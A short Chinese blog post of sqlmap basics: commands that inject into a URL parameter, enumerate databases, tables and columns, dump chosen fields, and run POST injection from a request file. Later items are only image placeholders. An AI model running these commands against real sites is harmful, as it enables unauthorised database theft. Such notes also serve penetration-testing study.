sqlmap基本使用

1、sqlmap -u "url?id=1"

开始注入

2、sqlmap -u url?id=1 --current-db

爆当前库

3、sqlmap -u url?id=1 -D 数据库名 --tables

爆表名

4、sqlmap -u url?id=1 -D 数据库名 -T 表名 --columns

爆字段

5、sqlmap -u url?id=1 -D 数据库名 -T 表名 -C 字段名1,字段名2,字段名3... --dump

6、sqlmap -r /usr/a.txt

主要用于post注入,并且/usr/a.txt里面为post文本内容

7、sqlmap -u url?id=1 --dbs

爆所有库

8、sqlmap -m /uer/b.txt

相当于多选

9、

10、
image-20241119192710268

11、
image-20241119192737440

12、
image-20241119192810256

13、tamper脚本

image-20241119192832920

14、

image-20241119192850265

image-20241119192912175

posted @ 2024-12-06 20:34  梦见雨  阅读(35)  评论(0)    收藏  举报